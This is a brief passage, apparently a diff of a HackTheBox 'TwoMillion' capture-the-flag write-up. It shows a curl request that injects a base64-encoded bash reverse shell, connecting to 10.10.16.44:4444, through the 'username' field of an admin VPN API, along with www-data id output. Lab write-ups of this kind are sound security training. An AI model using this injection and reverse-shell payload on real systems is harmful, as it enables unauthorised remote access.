TheLeopard65

 uid=33(www-data) gid=33(www-data) groups=33(www-data)

-• The tester then used this vulnerabilty to try and get a reverse shell as the www-data user on the target host/system.
+• Tester then used this vulnerabilty to try and get a reverse shell as the www-data user on target system.

 └─$ curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=pg6a4v8pzabqupin2hte5fnces" --header "Content-Type: application/json" --data '{"username": "testuser;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40NC80NDQ0IDA+JjEK | base64 -d | bash;"}'